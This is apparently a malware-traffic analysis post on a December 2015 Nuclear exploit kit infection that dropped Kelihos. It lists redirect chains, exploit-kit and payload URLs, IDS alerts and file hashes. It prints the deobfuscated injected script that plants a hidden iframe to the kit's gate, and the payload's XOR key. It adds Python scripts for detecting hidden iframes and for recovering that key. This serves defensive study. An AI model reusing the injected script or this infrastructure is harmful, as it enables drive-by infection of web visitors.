Notes
PCAP and Malware

PCAP here: 2015-12-21-Nuclear-EK-Traffic-Threatglass.pcap
Malware here: 2015-12-21-Malware-Exploits.zip

For password, please email me at jack@malwarefor.me.

Compromised Domain and Redirects

2015-12-21 04:23:31 - 185.53.91.89 - newimagepost.com - GET /
2015-12-21 04:23:40 - 45.63.13.175 - checkyourtraff.ml - GET /r/affiliate/
2015-12-21 04:23:41 - 104.131.220.187 - game.gameforgods.com - GET /ad/?id=6943631&keyword=mediahub&tsrc=mediahub

Deobfuscated JavaScript:
var ctdznf=document.createElement("div");ctdznf.innerHTML="<style>#xntfyf{position:absolute;z-index:1000;top:-1000px;left:-9999px;}</style><div id=\"xntfyf\"><iframe src=\"http://zzz1.zzzmaluw4.ws/threshers/consultant.php?flowerpot=5375&dates=looneyier\"></iframe></div>";document.body.appendChild(ctdznf);
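As an added example (not part of the original post), the following Python script picks out iframes that a page hides the way the injected script above does: it reads the page's <style> rules and inline style attributes, flags elements parked far off-canvas, zero-sized or otherwise invisible, and reports any iframe sitting inside one. The input is constructed from the injected innerHTML above plus a made-up benign embed (video.example) that the check must leave alone; the -500px off-canvas threshold is an assumption.

```python
import re
from html.parser import HTMLParser

# Elements parked further off-canvas than this are treated as deliberately hidden.
# The threshold is an assumption; the injected rule above uses -1000px and -9999px.
OFFSCREEN_PX = -500

_ID_RULE = re.compile(r"#([A-Za-z_][\w-]*)\s*\{([^}]*)\}")
_PX = re.compile(r"^(-?\d+)px$")


def hidden_reasons(css_body: str) -> list:
    """Return the declarations in one rule body (or style attribute) that hide an element."""
    decls = {}
    for decl in css_body.split(";"):
        if ":" in decl:
            prop, val = decl.split(":", 1)
            decls[prop.strip().lower()] = val.strip().lower()
    reasons = []
    for prop in ("top", "left"):
        m = _PX.match(decls.get(prop, ""))
        if m and int(m.group(1)) < OFFSCREEN_PX:
            reasons.append(f"{prop}:{decls[prop]}")
    for prop in ("width", "height"):
        m = _PX.match(decls.get(prop, ""))
        if m and int(m.group(1)) <= 1:
            reasons.append(f"{prop}:{decls[prop]}")
    if decls.get("display") == "none":
        reasons.append("display:none")
    if decls.get("visibility") == "hidden":
        reasons.append("visibility:hidden")
    return reasons


class _Collector(HTMLParser):
    """Gathers <style> text and, for every <iframe>, the chain of open elements above it."""

    def __init__(self):
        super().__init__()
        self.css = []
        self.in_style = False
        self.open_elems = []   # (id, inline-style reasons) for each currently open element
        self.iframes = []      # (src, chain) with chain outermost-first, the iframe itself last

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        entry = (a.get("id"), hidden_reasons(a.get("style") or ""))
        if tag == "iframe":
            self.iframes.append((a.get("src") or "", self.open_elems + [entry]))
            return                        # iframe is treated as a leaf; its end tag is ignored too
        if tag == "style":
            self.in_style = True
        self.open_elems.append(entry)

    def handle_endtag(self, tag):
        if tag == "iframe":
            return
        if tag == "style":
            self.in_style = False
        if self.open_elems:
            self.open_elems.pop()

    def handle_data(self, data):
        if self.in_style:
            self.css.append(data)


def find_hidden_iframes(html: str) -> list:
    """Return (src, hidden_by, reasons) for each iframe hidden by itself or by an ancestor."""
    c = _Collector()
    c.feed(html)
    c.close()
    rules = {ident: hidden_reasons(body) for ident, body in _ID_RULE.findall("".join(c.css))}
    hits = []
    for src, chain in c.iframes:
        for ident, inline in chain:
            reasons = inline + rules.get(ident, [])
            if reasons:
                hits.append((src, f"#{ident}" if ident else "<inline style>", reasons))
                break
    return hits


# Constructed input: the innerHTML injected by the deobfuscated script above, plus a
# made-up benign embed (video.example) that the check must leave alone.
SAMPLE_HTML = (
    '<style>#xntfyf{position:absolute;z-index:1000;top:-1000px;left:-9999px;}'
    '#player{width:640px;height:360px;}</style>'
    '<div id="xntfyf"><iframe src="http://zzz1.zzzmaluw4.ws/threshers/consultant.php'
    '?flowerpot=5375&dates=looneyier"></iframe></div>'
    '<div id="player"><iframe src="https://video.example/embed/123"></iframe></div>'
)

if __name__ == "__main__":
    for src, hidden_by, reasons in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe -> {src}  (hidden by {hidden_by}: {', '.join(reasons)})")
```

Run against a saved copy of the compromised page (or the innerHTML recovered from the deobfuscated script) it reports the gate URL together with the declarations that hide it; the benign embed produces no output.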

Nuclear EK Traffic

2015-12-21 04:23:42 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /threshers/consultant.php?flowerpot=5375&dates=looneyier
2015-12-21 04:23:43 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /typifying/inseparability/thumbtack/flatness/abashing.php?construe=592213114379&arouse=39050
2015-12-21 04:23:45 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /continued/grieves/experimented.php?prows=279452299216
2015-12-21 04:23:46 - 46.101.82.41 - zzz1.zzzmaluw4.ws - GET /presumed/mousetraps/endeavoring/leonine.php?zigzagging=586722145937

Payload XOR'd with ASCII string 'IluHpE'
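Added example, not from the original post: a Python script for recovering and applying a repeating XOR key such as the one above. It assumes the key is applied byte by byte and repeated over the whole payload, and that the payload is a Windows executable, so 'MZ' at offset 0 and the standard DOS-stub message at offset 0x4E serve as known plaintext to derive the key without knowing it in advance. The sample buffer is a constructed PE header skeleton, not the actual payload from the zip.

```python
KEY = b"IluHpE"  # repeating XOR key reported for this Nuclear EK payload

# Known plaintext present in nearly every PE file: the DOS stub message at offset 0x4E.
DOS_STUB = b"This program cannot be run in DOS mode."
KNOWN_PLAINTEXT = [(0x00, b"MZ"), (0x4E, DOS_STUB)]


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key repeated to cover it; XOR is its own inverse, so this also decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Sanity check for a decoded payload: 'MZ' at 0 and 'PE\\0\\0' where e_lfanew points."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_key(ciphertext: bytes, knowns, key_len: int):
    """Derive a key_len-byte repeating key from (offset, plaintext) pairs.

    Returns None when the known bytes contradict each other for this key length
    (wrong length guess) or leave some key position undetermined.
    """
    key = [None] * key_len
    for offset, plain in knowns:
        for i, p in enumerate(plain):
            idx = offset + i
            if idx >= len(ciphertext):
                return None
            pos, k = idx % key_len, ciphertext[idx] ^ p
            if key[pos] is None:
                key[pos] = k
            elif key[pos] != k:
                return None
    return None if None in key else bytes(key)


def guess_key(ciphertext: bytes, max_len: int = 32):
    """Try key lengths shortest-first; accept the first that is self-consistent and
    yields a buffer that actually looks like a PE. Any multiple of the true length is
    also consistent, which is why the shortest fit wins."""
    for n in range(1, max_len + 1):
        cand = recover_key(ciphertext, KNOWN_PLAINTEXT, n)
        if cand is not None and looks_like_pe(xor_repeating(ciphertext, cand)):
            return cand
    return None


def build_sample_pe() -> bytes:
    """Constructed stand-in for the dropped executable: a minimal MZ/PE header skeleton."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x80).to_bytes(4, "little")        # e_lfanew -> PE signature at 0x80
    buf[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    buf[0x80:0x84] = b"PE\x00\x00"
    buf[0x84:0x86] = (0x14C).to_bytes(2, "little")       # Machine = IMAGE_FILE_MACHINE_I386
    return bytes(buf)


if __name__ == "__main__":
    plain = build_sample_pe()
    blob = xor_repeating(plain, KEY)                      # what the EK would have served
    print("encoded starts with MZ:", blob[:2] == b"MZ")
    found = guess_key(blob)
    print("recovered key:", found)
    print("decodes to PE:", looks_like_pe(xor_repeating(blob, found)))
```

On a real capture, feed the raw HTTP response body from the payload request into guess_key; if the kit had not used the DOS stub text (some pack or strip it), swap in another known region such as the 'PE\0\0' signature at the offset the decoded e_lfanew points to.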

Post-Infection Kelihos Traffic

2015-12-21 04:23:47 - 118.26.116.159 - 118.26.116.159 - GET /obsorbu.exe
2015-12-21 04:23:47 - 118.26.116.159 - 118.26.116.159 - GET /obsorbu.exe

IDS alerts using the Emerging Threats Pro Ruleset (INFO/POLICY disabled) on Suricata 2.0.8

2015-12-21 04:23:32 - 185.53.91.89:80 -> 192.168.33.10:1041 - ET WEB_CLIENT Possible % Encoded Iframe Tag
2015-12-21 04:23:32 - 185.53.91.89:80 -> 192.168.33.10:1041 - ET WEB_CLIENT Hex Obfuscation of Script Tag % Encoding
2015-12-21 04:23:42 - 192.168.33.10:1093 -> 46.101.82.41:80 - ETPRO CURRENT_EVENTS Nuclear EK Landing URI struct Dec 03 2015 M1
2015-12-21 04:23:43 - 46.101.82.41:80 -> 192.168.33.10:1093 - ETPRO CURRENT_EVENTS Nuclear EK Landing Oct 20 2015 M1
2015-12-21 04:23:43 - 192.168.33.10:1093 -> 46.101.82.41:80 - ETPRO CURRENT_EVENTS Nuclear EK Flash Exploit IE Dec 03 2015 M1
2015-12-21 04:23:48 - 192.168.33.10:1097 -> 190.11.145.98:80 - ET TROJAN Possible Kelihos.F EXE Download Common Structure
2015-12-21 04:23:48 - 192.168.33.10:1098 -> 190.11.145.98:80 - ET TROJAN Possible Kelihos.F EXE Download Common Structure
2015-12-21 04:23:53 - 46.101.82.41:80 -> 192.168.33.10:1093 - ETPRO CURRENT_EVENTS Nuclear EK Flash Exploit Dec 03 2015
2015-12-21 04:24:57 - 192.168.33.10:1109 -> 118.26.116.159:80 - ET TROJAN Win32/Kelihos.F Checkin
2015-12-21 04:25:43 - 190.11.145.98:80 -> 192.168.33.10:1097 - ET TROJAN Possible Kelihos Infection Executable Download With Malformed Header

Preliminary Malware Analysis

File name: 2015-12-21-Nuclear-EK-Flash-Exploit.swf
File size: 93.1 KB ( 95324 bytes )
MD5 hash: 6e7b708857c2c4723c95e09564eb973c
Detection ratio: 1/53
First submission: 2015-12-21 19:31:42 UTC
VirusTotal link: https://www.virustotal.com/en/file/1dd65e400d19a31a520259b03b8ac232b8c7f0e6699ffc022273290d5758d2be/analysis/1451256579/

File name: 2015-12-21-Nuclear-EK-Payload.exe
File size: 99.5 KB ( 101890 bytes )
MD5 hash: 8b43ff1a7211831927bda03ac3ca7527
Detection ratio: 39/54
First submission: 2015-12-23 08:19:37 UTC
VirusTotal link: https://www.virustotal.com/en/file/63e23206d243bc38516079372fae014ae98b74489f5862bed3d289d42ba81ba9/analysis/1451256643/

File name: obsorbu.exe
File size: 1.0 MB ( 1082231 bytes )
MD5 hash: f149ec1a43cbaf9c005f4897648378c0
Detection ratio: 35/55
First submission: 2015-12-21 19:23:22 UTC
VirusTotal link: https://www.virustotal.com/en/file/efc55670c4bdb510b5d0da47c787c54c67d13339d02442bfbd5f8f531e54dc6a/analysis/1451256598/

If you have any feedback or questions please email me at jack@malwarefor.me.
Additionally, you can reach out on Twitter or follow for updates.